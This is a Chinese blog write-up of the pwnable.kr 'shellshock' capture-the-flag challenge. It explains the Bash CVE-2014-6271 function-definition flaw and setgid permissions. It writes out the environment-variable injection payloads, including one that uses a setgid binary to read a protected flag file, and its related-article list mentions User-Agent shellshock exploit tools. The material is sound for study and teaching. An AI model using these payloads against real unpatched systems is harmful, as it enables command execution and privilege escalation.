pwnable.kr-shellshock WP

最新推荐文章于 2022-10-03 20:29:34 发布
最新推荐文章于 2022-10-03 20:29:34 发布
阅读量312 收藏
点赞数
分类专栏: pwn学习 文章标签: pwnable.kr shellshock
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Casuall/article/details/89946854
版权

这道题涉及的知识点是shellshock(也叫破壳漏洞)CVE-2014-6271,GNU Bash 版本小于等于4.3可能存在这个漏洞。首先查看一下有什么文件

shellshock0.png

发现目录里有一个可执行文件bash,我们来查看一下bash的版本

shellshock1.png

可以看到这个路径中的bash版本低于4.3,下面来测试一下这两个版本的bash是否存在破壳漏洞

env x='() { :;}; echo shellshocked' bash –c "echo test"

shellshock2.png

可以看到bash不存在破壳漏洞,而./bash存在破壳漏洞,有关破壳漏洞的知识可以参考freebuf的文章和[aletero的博客]。

shellshock3.png

通过上面的两条语句可以说明在初始化环境变量时,将字符串解析成了函数,通过命令可以执行。

将shellshock简单的总结一下就是:当Bash在初始化环境变量时,语法解析器发现小括号和大括号的时候,就认为它是一个函数定义,Bash把函数体解析完了之后,去执行了函数定义后面的语句。

shellshock4.png

既然大括号后面的语句可以得到执行那么尝试一下下面的命令

env casuall='() { :;}; cat flag' ./bash -c "casuall"

shellshock5.png

提示没有权限,我们查看一下我们是哪个用户以及文件的权限

shellshock6.png

我们是shellshock用户,而flag只有root用户和shellshock_pwn组才有权限读。

我们看一下shellshock的源码

#include <stdio.h>
int main(){
    setresuid(getegid(), getegid(), getegid());
    setresgid(getegid(), getegid(), getegid());
    system("/home/shellshock/bash -c 'echo shock_me'");
    return 0;
}

shellshock 执行时将 RUID , EUID, SUID(以及RGID , EGID , SGID) 设置成 EGID,该进程就得到了对 flag文件的读权限。

RUID, 用于在系统中标识一个用户是谁,当用户使用用户名和密码成功登录后一个UNIX系统后就唯一确定了他的RUID.

EUID, 用于系统决定用户对系统资源的访问权限,通常情况下等于RUID。

SUID,用于对外权限的开放。跟RUID及EUID是用一个用户绑定不同,它是跟文件而不是跟用户绑定。

SUID的限制与功能:

- SUID权限仅对二进制程序有效;
- 执行者对于该程序需要具有x的可执行权限;
- 本权限仅在执行该程序的过程中有效;
- 执行者将具有该程序的所有者的权限。

与SUID不同的是,SGID可以针对文件或目录来设置,如果是对文件来说,SGID有如下的功能:

- SGID对二进制程序有用;
- 程序执行者对于该程序来说,需具备x的权限;
- 执行者在执行的过程中将会获得该程序用户组的支持。

可以看到shellshock在用户组可执行权限的地方是一个字母s,这表明在执行shellshock时可以获得shellshock所处用户组的权限(也就是shellshock_pwn)的权限,这样就被利用读取flag

我们构造以下命令

env casuall='() { :;}; cat flag' ./shellshock

shellshock7.png

Casuall
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
每日一题pwnable.kr shellshock
Kni9hT's Blog
09-04 349
Bash远程执行漏洞“破壳” [注:bash版本要在4.1以下] bash引自维基百科的描述为: "bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在 GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上,包括Linux与Mac OS X v10.4都将它作为默认shell。它也被移植到Microsoft Windows上的Cygwin与MinGW,或...
Lab-03--Shellshock.zip
12-22
Shellshock漏洞详解及其在Linux环境下的防范》 Shellshock漏洞,全名是BASH(Bourne Again SHell)漏洞,是2014年9月被发现的一个严重安全漏洞,影响了广泛使用的Unix/Linux操作系统及基于这些系统的服务器、路由器...
pwnable.kr-bof WP
Casuall的博客
03-24 5383
pwnable.kr-bof   这道题是一个简单的缓冲器溢出的题,首先要做这道题要对函数调用栈有一定的了解。 函数调用栈是指程序运行时内存一段连续的区域,用来保存函数运行时的状态信息,包括函数参数与局部变量等。称之为“栈”是因为发生函数调用时,调用函数(caller)的状态被保存在栈内,被调用函数(callee)的状态被压入调用栈的栈顶;在函数调用结束时,栈顶的函数(callee)状态被弹出,栈...
[pwnable.kr]shellshock
iekuil的博客
10-03 199
可以看到这里对() {开头的字符串没有太多检查就传给了parse_and_execute,而直接用bash会从环境变量PATH里面找系统默认的bash,而这个bash是没有漏洞的。靶场环境当前目录下的bash才是有漏洞的bash,调用时需要用./bash。2.需要有能够执行的高权限的程序,并且程序中存在启动bash子进程的操作。跟着网上的分析简单看了一下bash 4.3的varieble.c文件,就是之前的几个题都可以直接以文件名运行文件,可惜定义的很多东西不清楚干啥用的,测试的时候又把前面的坑踩了一次,
pwnable.kr [shellshock]
shisuan1的博客
12-09 239
pwnable.kr [shellshock] Mommy, there was a shocking news about bash. I bet you already know, but lets just make it sure
[WriteUp] pwnable.kr -- [shellshock]
qq_23026851的博客
07-31 464
题目: 解: 登录 检测是否存在shellshock漏洞: 上图有意思的地方在于,当输入“bash”时,没有触发shellshock漏洞;而“./bash”则触发了。究其原因,该服务器默认的bash程序没有shellshock漏洞,而当前目录下的这个vulnerable的“bash”是供我们练习专用的。 Shellshock的原理已经被探讨了很多,简单总结一下就是,当环境变量X被如此...
Bash漏洞-Shellshock浅析.pdf
07-10
Bash漏洞-Shellshock浅析.pdf 学习资料 复习资料 教学资源
UA-SHELLSHOCK:通过用户代理注入 Chrome 扩展命令
06-20
UA-SHELLSHOCK 通过“用户代理”的 Chrome 扩展命令注入。活动图标非活动图标信息该项目具有教育意义,只是展示了为 google chrome 创建扩展以利用最近的 Bash 漏洞是多么容易。 激活扩展时,任何浏览插件的页面都会...
Xpl-SHELLSHOCK-Ch3ck:该工具注入恶意用户代理,允许探索运行服务器端命令的 vulnerabildiade sheelshock
06-08
Xpl-SHELLSHOCK-Ch3ck 该工具注入恶意用户代理,允许探索运行服务器端命令的 vulnerabildiade shellshock。 # SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ] # EXPLOIT NAME: Xpl SHELLSHOCK Ch...
Cgi-bin 30个漏洞+使用方法.txt
07-18
Cgi-bin 30个漏洞+使用方法
通过pwnable.kr从零学pwn
热门推荐
giantbranch的专栏
07-31 1万+
本文链接:http://blog.csdn.net/u012763794/article/details/51992512 下面的这个地址很多ctf的学习资源都是有推荐的 挑战地址:http://pwnable.kr/play.php fd 首先不用说给了就直接连上去 看一下代码 重要函数:read ssize_t read(int fd,void *
pwnable.krshellshock
搓雪小怪兽的工作室
09-19 574
关于权限 一些名词如下: 缩写 全程 含义 RUID real user ID 启动该进程的用的id EUID Effective User ID 在内核检查权限的时候使用的(只有在设置了执行时设置用户id位才会与ruid区别) SSUID saved set user ID 保存的设置用户id,是程序所有者的id 比如一个程序的所有者为admin,现在guest用户执...
pwnable.krshellshock
think_ycx的专栏
10-06 408
  本关主要是考察shellshock漏洞。 ssh shellshock@pwnable.kr -p2222登陆后看一下权限: shellshock@ubuntu:~$ ls -al total 980 drwxr-x--- 5 root shellshock 4096 Oct 23 2016 . drwxr-xr-x 92 root root ...
pwnable.kr-----解题过程】shellshock
lyuchen65的博客
09-16 1230
#include int main(){ setresuid(getegid(), getegid(), getegid()); setresgid(getegid(), getegid(), getegid()); system("/home/shellshock/bash -c 'echo shock_me'"); return 0; }根据题目一下子可以看出来这是shellshoc
pwnable.kr-flag WP
Casuall的博客
03-26 394
将文件下载下来,用file命令查看一下,是一个64位可执行文件 用64位的IDA打开,发现里面的函数少的可怜,疑似加壳了 放到查壳工具里看一下,发现是UPX的壳,这里用linux下的命令xxd flag | tail(xxd的作用就是将一个文件以十六进制的形式显示出来,tail命令用途是依照要求将指定的文件的最后部分输出到标准设备,通常是终端,通俗讲来,就是把某个档案文件的最后几行显示到终端上...
FILE_DESCRIPTION pwnable.kr wp
moep0的博客
10-27 175
问题要求我们访问ssh fd@pwnable.kr -p 2222   我们按照上述描述访问,查看一下文件夹。 flag文件引起了我们的注意 访问失败 难道要提权吗,一个1pt的题目欸...... ctrl+shift+t (Alt+1可以切换)开一个新的terminal 把这个c文件源代码下下来看一下 出现了几个不认识(假装)的函数 我们来看一下 先是atoi...
软件安全课程实验2 Shellshock Attack lab
zino00的博客
01-27 3849
Shellshock_Attack_lab task 1 //vul.c #include <unistd.h> #include <stdio.h> #include <stdlib.h> void main(){ setuid(geteuid()); system("/bin/ls -l"); } 首先准备有漏洞的程序vul.c 然后我们编译运行,并将其变成一个set-UID程序 因为Ubuntu20.04中/bin/sh指向/bin/dash,而这个程序没有s
shellshock
最新发布
03-16
Shellshock是一个严重的计算机安全漏洞,影响了许多操作系统和应用程序。它允许攻击者通过特殊构造的命令来执行恶意代码,从而控制受感染的系统。Shellshock漏洞最初被发现于2014年,但仍然是一个重要的安全问题。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值